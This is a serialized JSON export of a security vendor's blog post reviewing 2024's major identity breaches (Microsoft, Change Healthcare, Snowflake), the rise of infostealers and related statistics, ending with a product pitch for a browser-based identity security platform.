",[],{},{"nodeType":312,"data":150072,"content":150076},{"target":150073},{"sys":150074},{"id":150075,"type":317,"linkType":318},"SCbhb6dzXnaKUianhgLEL",[],{"nodeType":178,"data":150078,"content":150079},{},[150080],{"nodeType":173,"value":150081,"marks":150082,"data":150083},"In 2024, we’ve seen examples of both SaaS-based account takeover as well as identity attacks being used for initial access to more traditional networks, often resulting in ransomware deployment.",[],{},{"nodeType":231,"data":150085,"content":150086},{},[],{"nodeType":169,"data":150088,"content":150089},{},[150090],{"nodeType":173,"value":150091,"marks":150092,"data":150094},"Breakdown of public identity breaches in 2024",[150093],{"type":370},{},{"nodeType":178,"data":150096,"content":150097},{},[150098],{"nodeType":173,"value":150099,"marks":150100,"data":150101},"It’s always tricky to gauge the impact of a cyber breach, particularly when considering the limited information typically shared. Different types of breach are easier to assess than others — for example, any breach involving extortion/ransom payment has a clear cost associated. Regulator fines and penalties are also clear cut. But aside from these, you’re looking at the extent of any disruption/downtime, recovery costs, and the like. Long term, indirect impacts such as the loss of customer confidence are naturally tricky to estimate. ",[],{},{"nodeType":178,"data":150103,"content":150104},{},[150105],{"nodeType":173,"value":150106,"marks":150107,"data":150108},"However, many identity breaches don’t even have these metrics to go by. The general shift toward data theft only (as opposed to ransomware deployment) continued in 2024, and many of the public identity breaches reflect this. In these attacks, attackers steal data to extort a ransom payment, blackmail end-customers, and/or sell the data via underground criminal marketplaces. ",[],{},{"nodeType":178,"data":150110,"content":150111},{},[150112],{"nodeType":173,"value":150113,"marks":150114,"data":150115},"The one consistent metric we do have is the number of breached records, which is available in many (but not all) cases. Some organizations have attempted to calculate the financial impact per breached record. Most notably IBMs annual ‘Cost of a Data Breach’ report estimates the average data breach to cost $4.88m, and the cost per compromised record to be $169. But when applied to the sheer magnitude of 2024’s biggest attacks (in the region of hundreds of millions of breached records) the figures quickly reach unbelievable levels. ",[],{},{"nodeType":178,"data":150117,"content":150118},{},[150119],{"nodeType":173,"value":150120,"marks":150121,"data":150122},"All this is to say: It’s hard to pin down the relative impact of data breaches. But with the information available (profile of the victim organization, type of data impacted, number of customers impacted) it’s possible to provide a finger-in-the-air assessment — which is what I’ve attempted to do below. Here, we can see the overall month-by-month impact of public identity breaches, dated from when they were first reported (or using dates provided in said reports). ",[],{},{"nodeType":312,"data":150124,"content":150128},{"target":150125},{"sys":150126},{"id":150127,"type":317,"linkType":318},"2XYuNqLuKhZbISb4II9IW4",[],{"nodeType":178,"data":150130,"content":150131},{},[150132],{"nodeType":173,"value":150133,"marks":150134,"data":150135},"Let’s take a closer look at the most notable breaches (and why they were especially significant). ",[],{},{"nodeType":231,"data":150137,"content":150138},{},[],{"nodeType":169,"data":150140,"content":150141},{},[150142],{"nodeType":173,"value":150143,"marks":150144,"data":150146},"Top 3 public identity-related breaches in 2024",[150145],{"type":370},{},{"nodeType":235,"data":150148,"content":150149},{},[150150],{"nodeType":173,"value":150151,"marks":150152,"data":150154},"#3: Microsoft — January 2024",[150153],{"type":370},{},{"nodeType":178,"data":150156,"content":150157},{},[150158],{"nodeType":173,"value":150159,"marks":150160,"data":150161},"The threat group known as APT29, associated with the Russian SVR intelligence service, utilized password spray attacks that successfully compromised a non-production tenant account that did not have multi-factor authentication (MFA) enabled. They then leveraged this account to compromise a ‘test’ OAuth application that had elevated access to the Microsoft corporate environment. This was then used to access the email accounts of Microsoft employees. ",[],{},{"nodeType":178,"data":150163,"content":150164},{},[150165],{"nodeType":173,"value":150166,"marks":150167,"data":150168},"The attacks then continued throughout the year using information stolen from Microsoft mailboxes, with password spraying attacks increasing tenfold since the initial attack, resulting in the further compromise of source code repositories. ",[],{},{"nodeType":178,"data":150170,"content":150171},{},[150172],{"nodeType":173,"value":150173,"marks":150174,"data":150175},"Microsoft has shared limited information about the breach, but despite this it caused a significant stir. We can expect the number of email accounts compromised to be significant, given that it was later suggested that at least 100 external organizations had been contacted by Microsoft regarding their communications being breached (we only know this because 100-ish organizations reported the email as spam). The list of companies impacted included both public and private sector organizations, from major enterprises to government agencies in the US and other countries. ",[],{},{"nodeType":178,"data":150177,"content":150178},{},[150179,150183,150191],{"nodeType":173,"value":150180,"marks":150181,"data":150182},"Microsoft’s challenges with credential management didn’t end here either, ",[],{},{"nodeType":186,"data":150184,"content":150185},{"uri":139925},[150186],{"nodeType":173,"value":150187,"marks":150188,"data":150190},"with bug bounty hunters able to use stolen credentials from a TI platform to breach Microsoft’s ServiceNow tenant",[150189],{"type":194},{},{"nodeType":173,"value":150192,"marks":150193,"data":150194},", accessing 1,000s of support ticket descriptions and attachments, and 250k+ employee emails.",[],{},{"nodeType":235,"data":150196,"content":150197},{},[150198],{"nodeType":173,"value":150199,"marks":150200,"data":150202},"#2: Change Healthcare — February 2024",[150201],{"type":370},{},{"nodeType":178,"data":150204,"content":150205},{},[150206],{"nodeType":173,"value":150207,"marks":150208,"data":150209},"In February, attackers stole 6TB of data from UnitedHealth subsidiary Change Healthcare as part of a severe ransomware attack that caused massive disruption to the US healthcare industry. This impacted a wide range of critical services used by healthcare providers across the U.S., including payment processing, prescription writing, and insurance claims, and caused financial damages estimated at $872 million. The attack impacted the personal medical data of over 100M customers. ",[],{},{"nodeType":178,"data":150211,"content":150212},{},[150213],{"nodeType":173,"value":150214,"marks":150215,"data":150216},"The attacker used stolen credentials to breach the company's Citrix remote access service, which did not have multi-factor authentication enabled, as the initial breach vector for the attack. ",[],{},{"nodeType":178,"data":150218,"content":150219},{},[150220],{"nodeType":173,"value":150221,"marks":150222,"data":150223},"Following the attack, the organization's IT team replaced thousands of laptops, rotated credentials, and completely rebuilt Change Healthcare's data center network and core services.",[],{},{"nodeType":178,"data":150225,"content":150226},{},[150227],{"nodeType":173,"value":150228,"marks":150229,"data":150230},"The UnitedHealth Group admitted to paying a ransom demand to receive a decryptor and for the threat actors to delete the stolen data. The ransom payment was allegedly $22 million, according to the BlackCat ransomware affiliate who conducted the attack.",[],{},{"nodeType":235,"data":150232,"content":150233},{},[150234],{"nodeType":173,"value":150235,"marks":150236,"data":150238},"#1: Snowflake — April-June 2024",[150237],{"type":370},{},{"nodeType":178,"data":150240,"content":150241},{},[150242],{"nodeType":173,"value":150243,"marks":150244,"data":150245},"165 organizations around the world were targeted using stolen credentials gathered from infostealer infections dating back to 2020. The impacted accounts lacked MFA, meaning successful authentication only required a valid username and password. As the Snowflake credentials found in infostealer malware credential dumps had not been rotated or updated, they remained valid and could be used to authenticate to user accounts on Snowflake tenants belonging to various customers. It has been touted by some news outlets as ‘one of the biggest breaches ever’. ",[],{},{"nodeType":178,"data":150247,"content":150248},{},[150249],{"nodeType":173,"value":150250,"marks":150251,"data":150252},"In total, nine public victims were named following the breach, collectively impacting hundreds of millions of their respective customers. Data was put up for sale on criminal forums for fees ranging from $150k to $2m per organization, while AT&T was also confirmed as paying an undisclosed ransom fee. ",[],{},{"nodeType":312,"data":150254,"content":150258},{"target":150255},{"sys":150256},{"id":150257,"type":317,"linkType":318},"68txz4KkLmCX2hF9QySUZs",[],{"nodeType":231,"data":150260,"content":150261},{},[],{"nodeType":169,"data":150263,"content":150264},{},[150265],{"nodeType":173,"value":150266,"marks":150267,"data":150269},"Identity attacks vs. other attacks in 2024",[150268],{"type":370},{},{"nodeType":178,"data":150271,"content":150272},{},[150273],{"nodeType":173,"value":150274,"marks":150275,"data":150276},"In many ways, 2024 was a year of identity attacks. The attacks on Snowflake customers was unarguably one of (if not the most) significant cyber security event of the year (at least, if you exclude CrowdStrike causing a worldwide outage in July) — certainly, it was the largest perpetrated by a criminal group against commercial enterprises. ",[],{},{"nodeType":178,"data":150278,"content":150279},{},[150280],{"nodeType":173,"value":150281,"marks":150282,"data":150283},"Arguably the biggest non-identity story of the year was the Chinese state-sponsored “Salt Typhoon” campaign against global telecommunications firms, with at least nine major providers compromised — including AT&T, Verizon, and T-Mobile. The group reportedly focused on infiltrating telecommunications infrastructure to steal text messages, phone call information, and voicemails from targeted people. The threat actors also targeted the wiretapping platforms used by the US government, raising serious national security concerns.",[],{},{"nodeType":178,"data":150285,"content":150286},{},[150287],{"nodeType":173,"value":150288,"marks":150289,"data":150290},"Undoubtedly this was one of the biggest intelligence compromises in US history and is of major significance. But it’s also arguable that identity attacks had a more widespread commercial impact in 2024 when we look at the big picture.   ",[],{},{"nodeType":178,"data":150292,"content":150293},{},[150294],{"nodeType":173,"value":150295,"marks":150296,"data":150297},"Attacks on edge networking devices were also incredibly prominent, as were very much interlinked with the targeting of telecommunications infrastructure. A barrage of 0-days generated a huge amount of concern about the software security practices of many vendors. ",[],{},{"nodeType":178,"data":150299,"content":150300},{},[150301],{"nodeType":173,"value":150302,"marks":150303,"data":150304},"But despite these honorable mentions, the runaway threat of the year was an identity-based one… ",[],{},{"nodeType":231,"data":150306,"content":150307},{},[],{"nodeType":169,"data":150309,"content":150310},{},[150311],{"nodeType":173,"value":150312,"marks":150313,"data":150315},"Threat of the year: Infostealers",[150314],{"type":370},{},{"nodeType":178,"data":150317,"content":150318},{},[150319],{"nodeType":173,"value":150320,"marks":150321,"data":150322},"2024 saw an unprecedented rise in the role of infostealers. The played a huge role in the attacks on Snowflake customers, where 80% of the accounts were targeted using credentials found in infostealer infections. ",[],{},{"nodeType":178,"data":150324,"content":150325},{},[150326],{"nodeType":173,"value":150327,"marks":150328,"data":150329},"News relating to new infostealer variants and distributions campaigns came thick and fast in 2024, as attackers sought to harvest credentials from victims to use as part of their own malicious campaigns, or to sell on to other criminals on underground marketplaces for compromised credentials. Attackers leaned into alternative distribution channels, branching away from email-based campaigns to target victims via gaming forums, Facebook ads, and YouTube video descriptions. GitHub was also continuously targeted as a malware distribution mechanism throughout the year — and the majority of the time it was to push infostealers. ",[],{},{"nodeType":178,"data":150331,"content":150332},{},[150333],{"nodeType":173,"value":150334,"marks":150335,"data":150336},"Infostealers are the weapon of choice for attackers looking to harvest credentials at scale. Compared to credential harvesting phishing campaigns, infostealers target a much broader range of credentials, taking everything saved in the victim’s browser (and often also from local apps, including password managers).",[],{},{"nodeType":178,"data":150338,"content":150339},{},[150340],{"nodeType":173,"value":150341,"marks":150342,"data":150343},"Infostealers are nothing new, but have historically been seen as a problem affecting less secure personal devices and accounts. But 2024 has demonstrated that infostealers are finding ways to harvest business data — by finding ways around controls like EDR, and because of the ways that personal and business identities and accounts are converging in the modern workplace. For example, it’s not uncommon for employees to log into their personal Google account on their work device (and vice versa), inadvertently saving corporate credentials to their personal password store — which is later compromised through an infostealer infection on a personal device. ",[],{},{"nodeType":178,"data":150345,"content":150346},{},[150347],{"nodeType":173,"value":150348,"marks":150349,"data":150350},"The impact of infostealers (and the resulting stolen credentials and session cookies) is underlined by various figures:",[],{},{"nodeType":250,"data":150352,"content":150353},{},[150354,150374,150396,150418,150438],{"nodeType":254,"data":150355,"content":150356},{},[150357],{"nodeType":178,"data":150358,"content":150359},{},[150360,150364,150371],{"nodeType":173,"value":150361,"marks":150362,"data":150363},"79% of web application compromises were the result of breached credentials (",[],{},{"nodeType":186,"data":150365,"content":150366},{"uri":125982},[150367],{"nodeType":173,"value":1300,"marks":150368,"data":150370},[150369],{"type":194},{},{"nodeType":173,"value":53584,"marks":150372,"data":150373},[],{},{"nodeType":254,"data":150375,"content":150376},{},[150377],{"nodeType":178,"data":150378,"content":150379},{},[150380,150384,150393],{"nodeType":173,"value":150381,"marks":150382,"data":150383},"Infostealer activity increased by 266% in 2023, while the number of attacks featuring valid credentials saw a 71% increase year-over-year (",[],{},{"nodeType":186,"data":150385,"content":150387},{"uri":150386},"https://www.ibm.com/downloads/cas/L0GKXDWJ",[150388],{"nodeType":173,"value":150389,"marks":150390,"data":150392},"IBM",[150391],{"type":194},{},{"nodeType":173,"value":53584,"marks":150394,"data":150395},[],{},{"nodeType":254,"data":150397,"content":150398},{},[150399],{"nodeType":178,"data":150400,"content":150401},{},[150402,150406,150415],{"nodeType":173,"value":150403,"marks":150404,"data":150405},"Nearly half of the malware detected last year targeted victims’ data specifically, and the majority of that malware was classified as infostealers (",[],{},{"nodeType":186,"data":150407,"content":150409},{"uri":150408},"https://news.sophos.com/en-us/2024/03/12/2024-sophos-threat-report/",[150410],{"nodeType":173,"value":150411,"marks":150412,"data":150414},"Sophos",[150413],{"type":194},{},{"nodeType":173,"value":53584,"marks":150416,"data":150417},[],{},{"nodeType":254,"data":150419,"content":150420},{},[150421],{"nodeType":178,"data":150422,"content":150423},{},[150424,150428,150435],{"nodeType":173,"value":150425,"marks":150426,"data":150427},"39,000 session token attacks are detected per day (",[],{},{"nodeType":186,"data":150429,"content":150430},{"uri":125812},[150431],{"nodeType":173,"value":1255,"marks":150432,"data":150434},[150433],{"type":194},{},{"nodeType":173,"value":53584,"marks":150436,"data":150437},[],{},{"nodeType":254,"data":150439,"content":150440},{},[150441],{"nodeType":178,"data":150442,"content":150443},{},[150444,150448,150456],{"nodeType":173,"value":150445,"marks":150446,"data":150447},"Attacks on session cookies happen at the same rough order of magnitude as password-based attacks (",[],{},{"nodeType":186,"data":150449,"content":150451},{"uri":150450},"https://github.com/WICG/dbsc/issues/13#issuecomment-1977657864",[150452],{"nodeType":173,"value":96495,"marks":150453,"data":150455},[150454],{"type":194},{},{"nodeType":173,"value":53584,"marks":150457,"data":150458},[],{},{"nodeType":178,"data":150460,"content":150461},{},[150462,150466,150471],{"nodeType":173,"value":150463,"marks":150464,"data":150465},"And of the confirmed identity-based breaches in the public domain that we identified, ",[],{},{"nodeType":173,"value":150467,"marks":150468,"data":150470},"a whopping 73% were the result of compromised credentials ",[150469],{"type":370},{},{"nodeType":173,"value":150472,"marks":150473,"data":150474},"(the rest were phishing attacks). ",[],{},{"nodeType":178,"data":150476,"content":150477},{},[150478],{"nodeType":173,"value":150479,"marks":150480,"data":150481},"As the primary source of compromised credentials, it’s fair to say that infostealers deserve the top spot for 2024.",[],{},{"nodeType":312,"data":150483,"content":150487},{"target":150484},{"sys":150485},{"id":150486,"type":317,"linkType":318},"7mMQEYQTXKAajIGFviDJKt",[],{"nodeType":231,"data":150489,"content":150490},{},[],{"nodeType":169,"data":150492,"content":150493},{},[150494],{"nodeType":173,"value":150495,"marks":150496,"data":150498},"Defend against infostealers with Push",[150497],{"type":370},{},{"nodeType":178,"data":150500,"content":150501},{},[150502],{"nodeType":173,"value":150503,"marks":150504,"data":150505},"As a browser-based identity security platform designed to stop identity attacks, Push helps organizations to defend against the rise in infostealers by:",[],{},{"nodeType":250,"data":150507,"content":150508},{},[150509,150542,150563],{"nodeType":254,"data":150510,"content":150511},{},[150512],{"nodeType":178,"data":150513,"content":150514},{},[150515,150518,150526,150530,150538],{"nodeType":173,"value":37,"marks":150516,"data":150517},[],{},{"nodeType":186,"data":150519,"content":150520},{"uri":62639},[150521],{"nodeType":173,"value":150522,"marks":150523,"data":150525},"Alerting you whenever the valid credentials your employees are using appear in a compromised credential data feed",[150524],{"type":194},{},{"nodeType":173,"value":150527,"marks":150528,"data":150529},", which can be leveraged to ",[],{},{"nodeType":186,"data":150531,"content":150532},{"uri":125749},[150533],{"nodeType":173,"value":150534,"marks":150535,"data":150537},"trigger automated password resets",[150536],{"type":194},{},{"nodeType":173,"value":150539,"marks":150540,"data":150541}," whenever an event fires and is received by your SIEM tool.",[],{},{"nodeType":254,"data":150543,"content":150544},{},[150545],{"nodeType":178,"data":150546,"content":150547},{},[150548,150551,150559],{"nodeType":173,"value":37,"marks":150549,"data":150550},[],{},{"nodeType":186,"data":150552,"content":150553},{"uri":4751},[150554],{"nodeType":173,"value":150555,"marks":150556,"data":150558},"Detecting session hijacking attacks using stolen cookies to identify when an attacker logs into an app",[150557],{"type":194},{},{"nodeType":173,"value":150560,"marks":150561,"data":150562}," from an unmanaged device without the Push browser extension — this can also be used to detect suspicious access in general!",[],{},{"nodeType":254,"data":150564,"content":150565},{},[150566],{"nodeType":178,"data":150567,"content":150568},{},[150569],{"nodeType":173,"value":150570,"marks":150571,"data":150572},"Enabling you to enforce MFA the next time an employee logs into an app (even when the app itself doesn’t allow you to enforce mandatory MFA) — particularly handy if a weak, breached, or reused password is detected for their account!  ",[],{},{"nodeType":178,"data":150574,"content":150575},{},[150576],{"nodeType":173,"value":150577,"marks":150578,"data":150579},"And much, much more. ",[],{},{"nodeType":178,"data":150581,"content":150582},{},[150583,150587,150594],{"nodeType":173,"value":150584,"marks":150585,"data":150586},"If you’d like to explore the platform yourself and discover more of our great features, you can ",[],{},{"nodeType":186,"data":150588,"content":150589},{"uri":1469},[150590],{"nodeType":173,"value":71815,"marks":150591,"data":150593},[150592],{"type":194},{},{"nodeType":173,"value":1477,"marks":150595,"data":150596},[],{},"Reviewing public breaches that stemmed from identity attacks in 2024. ","2025-01-10T00:00:00.000Z",{"items":150600},[150601],{"sys":150602,"name":505},{"id":504},{"items":150604},[150605],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":150606},{"url":1496},{"__typename":1528,"sys":150608,"content":150609,"title":144306,"synopsis":144307,"hashTags":118,"publishedDate":144308,"slug":144309,"tagsCollection":151145,"authorsCollection":151151},{"id":143690},{"json":150610},{"nodeType":165,"data":150611,"content":150612},{},[150613,150619,150632,150638,150643,150649,150655,150658,150664,150670,150676,150696,150702,150715,150718,150724,150730,150751,150757,150763,150779,150784,150790,150806,150811,150817,150857,150864,150870,150880,150890,150896,150922,150928,150931,150937,150953,150959,150965,150971,150974,150980,150987,150993,150999,151059,151065,151071,151077,151107,151113,151119,151125,151130],{"nodeType":178,"data":150614,"content":150615},{},[150616],{"nodeType":173,"value":143699,"marks":150617,"data":150618},[],{},{"nodeType":178,"data":150620,"content":150621},{},[150622,150625,150629],{"nodeType":173,"value":143706,"marks":150623,"data":150624},[],{},{"nodeType":173,"value":143710,"marks":150626,"data":150628},[150627],{"type":370},{},{"nodeType":173,"value":143715,"marks":150630,"data":150631},[],{},{"nodeType":178,"data":150633,"content":150634},{},[150635],{"nodeType":173,"value":143722,"marks":150636,"data":150637},[],{},{"nodeType":312,"data":150639,"content":150642},{"target":150640},{"sys":150641},{"id":143729,"type":317,"linkType":318},[],{"nodeType":178,"data":150644,"content":150645},{},[150646],{"nodeType":173,"value":143735,"marks":150647,"data":150648},[],{},{"nodeType":178,"data":150650,"content":150651},{},[150652],{"nodeType":173,"value":143742,"marks":150653,"data":150654},[],{},{"nodeType":231,"data":150656,"content":150657},{},[],{"nodeType":169,"data":150659,"content":150660},{},[150661],{"nodeType":173,"value":143752,"marks":150662,"data":150663},[],{},{"nodeType":178,"data":150665,"content":150666},{},[150667],{"nodeType":173,"value":143759,"marks":150668,"data":150669},[],{},{"nodeType":178,"data":150671,"content":150672},{},[150673],{"nodeType":173,"value":143766,"marks":150674,"data":150675},[],{},{"nodeType":178,"data":150677,"content":150678},{},[150679,150682,150686,150689,150693],{"nodeType":173,"value":143773,"marks":150680,"data":150681},[],{},{"nodeType":173,"value":143777,"marks":150683,"data":150685},[150684],{"type":370},{},{"nodeType":173,"value":3107,"marks":150687,"data":150688},[],{},{"nodeType":173,"value":143785,"marks":150690,"data":150692},[150691],{"type":370},{},{"nodeType":173,"value":10557,"marks":150694,"data":150695},[],{},{"nodeType":178,"data":150697,"content":150698},{},[150699],{"nodeType":173,"value":143796,"marks":150700,"data":150701},[],{},{"nodeType":178,"data":150703,"content":150704},{},[150705,150708,150712],{"nodeType":173,"value":143803,"marks":150706,"data":150707},[],{},{"nodeType":173,"value":143807,"marks":150709,"data":150711},[150710],{"type":370},{},{"nodeType":173,"value":143812,"marks":150713,"data":150714},[],{},{"nodeType":231,"data":150716,"content":150717},{},[],{"nodeType":169,"data":150719,"content":150720},{},[150721],{"nodeType":173,"value":143822,"marks":150722,"data":150723},[],{},{"nodeType":178,"data":150725,"content":150726},{},[150727],{"nodeType":173,"value":143829,"marks":150728,"data":150729},[],{},{"nodeType":250,"data":150731,"content":150732},{},[150733,150742],{"nodeType":254,"data":150734,"content":150735},{},[150736],{"nodeType":178,"data":150737,"content":150738},{},[150739],{"nodeType":173,"value":143842,"marks":150740,"data":150741},[],{},{"nodeType":254,"data":150743,"content":150744},{},[150745],{"nodeType":178,"data":150746,"content":150747},{},[150748],{"nodeType":173,"value":143852,"marks":150749,"data":150750},[],{},{"nodeType":178,"data":150752,"content":150753},{},[150754],{"nodeType":173,"value":143859,"marks":150755,"data":150756},[],{},{"nodeType":235,"data":150758,"content":150759},{},[150760],{"nodeType":173,"value":143866,"marks":150761,"data":150762},[],{},{"nodeType":178,"data":150764,"content":150765},{},[150766,150769,150776],{"nodeType":173,"value":143873,"marks":150767,"data":150768},[],{},{"nodeType":186,"data":150770,"content":150771},{"uri":4492},[150772],{"nodeType":173,"value":143880,"marks":150773,"data":150775},[150774],{"type":194},{},{"nodeType":173,"value":197,"marks":150777,"data":150778},[],{},{"nodeType":312,"data":150780,"content":150783},{"target":150781},{"sys":150782},{"id":143891,"type":317,"linkType":318},[],{"nodeType":178,"data":150785,"content":150786},{},[150787],{"nodeType":173,"value":143897,"marks":150788,"data":150789},[],{},{"nodeType":178,"data":150791,"content":150792},{},[150793,150796,150803],{"nodeType":173,"value":143904,"marks":150794,"data":150795},[],{},{"nodeType":186,"data":150797,"content":150798},{"uri":819},[150799],{"nodeType":173,"value":143911,"marks":150800,"data":150802},[150801],{"type":194},{},{"nodeType":173,"value":143916,"marks":150804,"data":150805},[],{},{"nodeType":312,"data":150807,"content":150810},{"target":150808},{"sys":150809},{"id":143923,"type":317,"linkType":318},[],{"nodeType":178,"data":150812,"content":150813},{},[150814],{"nodeType":173,"value":143929,"marks":150815,"data":150816},[],{},{"nodeType":250,"data":150818,"content":150819},{},[150820,150829,150838],{"nodeType":254,"data":150821,"content":150822},{},[150823],{"nodeType":178,"data":150824,"content":150825},{},[150826],{"nodeType":173,"value":143942,"marks":150827,"data":150828},[],{},{"nodeType":254,"data":150830,"content":150831},{},[150832],{"nodeType":178,"data":150833,"content":150834},{},[150835],{"nodeType":173,"value":143952,"marks":150836,"data":150837},[],{},{"nodeType":254,"data":150839,"content":150840},{},[150841],{"nodeType":178,"data":150842,"content":150843},{},[150844,150847,150854],{"nodeType":173,"value":143962,"marks":150845,"data":150846},[],{},{"nodeType":186,"data":150848,"content":150849},{"uri":143967},[150850],{"nodeType":173,"value":143970,"marks":150851,"data":150853},[150852],{"type":194},{},{"nodeType":173,"value":143975,"marks":150855,"data":150856},[],{},{"nodeType":178,"data":150858,"content":150859},{},[150860],{"nodeType":173,"value":143982,"marks":150861,"data":150863},[150862],{"type":370},{},{"nodeType":178,"data":150865,"content":150866},{},[150867],{"nodeType":173,"value":143990,"marks":150868,"data":150869},[],{},{"nodeType":178,"data":150871,"content":150872},{},[150873,150877],{"nodeType":173,"value":143997,"marks":150874,"data":150876},[150875],{"type":370},{},{"nodeType":173,"value":144002,"marks":150878,"data":150879},[],{},{"nodeType":178,"data":150881,"content":150882},{},[150883,150887],{"nodeType":173,"value":144009,"marks":150884,"data":150886},[150885],{"type":370},{},{"nodeType":173,"value":144014,"marks":150888,"data":150889},[],{},{"nodeType":235,"data":150891,"content":150892},{},[150893],{"nodeType":173,"value":144021,"marks":150894,"data":150895},[],{},{"nodeType":178,"data":150897,"content":150898},{},[150899,150902,150909,150912,150919],{"nodeType":173,"value":144028,"marks":150900,"data":150901},[],{},{"nodeType":186,"data":150903,"content":150904},{"uri":144033},[150905],{"nodeType":173,"value":144036,"marks":150906,"data":150908},[150907],{"type":194},{},{"nodeType":173,"value":144041,"marks":150910,"data":150911},[],{},{"nodeType":186,"data":150913,"content":150914},{"uri":144046},[150915],{"nodeType":173,"value":144049,"marks":150916,"data":150918},[150917],{"type":194},{},{"nodeType":173,"value":144054,"marks":150920,"data":150921},[],{},{"nodeType":178,"data":150923,"content":150924},{},[150925],{"nodeType":173,"value":144061,"marks":150926,"data":150927},[],{},{"nodeType":231,"data":150929,"content":150930},{},[],{"nodeType":169,"data":150932,"content":150933},{},[150934],{"nodeType":173,"value":144071,"marks":150935,"data":150936},[],{},{"nodeType":178,"data":150938,"content":150939},{},[150940,150943,150950],{"nodeType":173,"value":144078,"marks":150941,"data":150942},[],{},{"nodeType":186,"data":150944,"content":150945},{"uri":144083},[150946],{"nodeType":173,"value":144086,"marks":150947,"data":150949},[150948],{"type":194},{},{"nodeType":173,"value":144091,"marks":150951,"data":150952},[],{},{"nodeType":178,"data":150954,"content":150955},{},[150956],{"nodeType":173,"value":144098,"marks":150957,"data":150958},[],{},{"nodeType":178,"data":150960,"content":150961},{},[150962],{"nodeType":173,"value":144105,"marks":150963,"data":150964},[],{},{"nodeType":178,"data":150966,"content":150967},{},[150968],{"nodeType":173,"value":144112,"marks":150969,"data":150970},[],{},{"nodeType":231,"data":150972,"content":150973},{},[],{"nodeType":169,"data":150975,"content":150976},{},[150977],{"nodeType":173,"value":144122,"marks":150978,"data":150979},[],{},{"nodeType":178,"data":150981,"content":150982},{},[150983],{"nodeType":173,"value":144129,"marks":150984,"data":150986},[150985],{"type":370},{},{"nodeType":178,"data":150988,"content":150989},{},[150990],{"nodeType":173,"value":144137,"marks":150991,"data":150992},[],{},{"nodeType":178,"data":150994,"content":150995},{},[150996],{"nodeType":173,"value":144144,"marks":150997,"data":150998},[],{},{"nodeType":250,"data":151000,"content":151001},{},[151002,151021,151040],{"nodeType":254,"data":151003,"content":151004},{},[151005],{"nodeType":178,"data":151006,"content":151007},{},[151008,151011,151018],{"nodeType":173,"value":37,"marks":151009,"data":151010},[],{},{"nodeType":186,"data":151012,"content":151013},{"uri":144161},[151014],{"nodeType":173,"value":144161,"marks":151015,"data":151017},[151016],{"type":194},{},{"nodeType":173,"value":10557,"marks":151019,"data":151020},[],{},{"nodeType":254,"data":151022,"content":151023},{},[151024],{"nodeType":178,"data":151025,"content":151026},{},[151027,151030,151037],{"nodeType":173,"value":37,"marks":151028,"data":151029},[],{},{"nodeType":186,"data":151031,"content":151032},{"uri":144181},[151033],{"nodeType":173,"value":144181,"marks":151034,"data":151036},[151035],{"type":194},{},{"nodeType":173,"value":37,"marks":151038,"data":151039},[],{},{"nodeType":254,"data":151041,"content":151042},{},[151043],{"nodeType":178,"data":151044,"content":151045},{},[151046,151049,151056],{"nodeType":173,"value":37,"marks":151047,"data":151048},[],{},{"nodeType":186,"data":151050,"content":151051},{"uri":144201},[151052],{"nodeType":173,"value":144201,"marks":151053,"data":151055},[151054],{"type":194},{},{"nodeType":173,"value":1477,"marks":151057,"data":151058},[],{},{"nodeType":178,"data":151060,"content":151061},{},[151062],{"nodeType":173,"value":144214,"marks":151063,"data":151064},[],{},{"nodeType":235,"data":151066,"content":151067},{},[151068],{"nodeType":173,"value":144221,"marks":151069,"data":151070},[],{},{"nodeType":178,"data":151072,"content":151073},{},[151074],{"nodeType":173,"value":144228,"marks":151075,"data":151076},[],{},{"nodeType":250,"data":151078,"content":151079},{},[151080,151089,151098],{"nodeType":254,"data":151081,"content":151082},{},[151083],{"nodeType":178,"data":151084,"content":151085},{},[151086],{"nodeType":173,"value":144241,"marks":151087,"data":151088},[],{},{"nodeType":254,"data":151090,"content":151091},{},[151092],{"nodeType":178,"data":151093,"content":151094},{},[151095],{"nodeType":173,"value":144251,"marks":151096,"data":151097},[],{},{"nodeType":254,"data":151099,"content":151100},{},[151101],{"nodeType":178,"data":151102,"content":151103},{},[151104],{"nodeType":173,"value":144261,"marks":151105,"data":151106},[],{},{"nodeType":235,"data":151108,"content":151109},{},[151110],{"nodeType":173,"value":1422,"marks":151111,"data":151112},[],{},{"nodeType":178,"data":151114,"content":151115},{},[151116],{"nodeType":173,"value":144274,"marks":151117,"data":151118},[],{},{"nodeType":178,"data":151120,"content":151121},{},[151122],{"nodeType":173,"value":144281,"marks":151123,"data":151124},[],{},{"nodeType":312,"data":151126,"content":151129},{"target":151127},{"sys":151128},{"id":144288,"type":317,"linkType":318},[],{"nodeType":178,"data":151131,"content":151132},{},[151133,151136,151142],{"nodeType":173,"value":144294,"marks":151134,"data":151135},[],{},{"nodeType":186,"data":151137,"content":151138},{"uri":473},[151139],{"nodeType":173,"value":126601,"marks":151140,"data":151141},[],{},{"nodeType":173,"value":126605,"marks":151143,"data":151144},[],{},{"items":151146},[151147,151149],{"sys":151148,"name":505},{"id":504},{"sys":151150,"name":26137},{"id":26136},{"items":151152},[151153],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":151154},{"url":13981},{"items":151156},[151157],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":151158},{"url":1496},{"json":151160,"links":151917},{"nodeType":165,"data":151161,"content":151162},{},[151163,151169,151175,151181,151186,151189,151196,151212,151218,151224,151230,151251,151258,151261,151268,151274,151280,151286,151292,151297,151303,151309,151339,151345,151352,151357,151363,151379,151395,151402,151418,151423,151429,151435,151465,151472,151478,151483,151489,151495,151521,151528,151544,151551,151567,151574,151580,151585,151591,151594,151601,151617,151666,151672,151678,151685,151691,151712,151718,151734,151739,151745,151750,151756,151813,151820,151836,151842,151863,151866,151873,151879,151884,151890,151906,151911],{"nodeType":178,"data":151164,"content":151165},{},[151166],{"nodeType":173,"value":114543,"marks":151167,"data":151168},[],{},{"nodeType":178,"data":151170,"content":151171},{},[151172],{"nodeType":173,"value":114550,"marks":151173,"data":151174},[],{},{"nodeType":178,"data":151176,"content":151177},{},[151178],{"nodeType":173,"value":114557,"marks":151179,"data":151180},[],{},{"nodeType":312,"data":151182,"content":151185},{"target":151183},{"sys":151184},{"id":4028,"type":317,"linkType":318},[],{"nodeType":231,"data":151187,"content":151188},{},[],{"nodeType":169,"data":151190,"content":151191},{},[151192],{"nodeType":173,"value":114572,"marks":151193,"data":151195},[151194],{"type":370},{},{"nodeType":178,"data":151197,"content":151198},{},[151199,151202,151209],{"nodeType":173,"value":5039,"marks":151200,"data":151201},[],{},{"nodeType":186,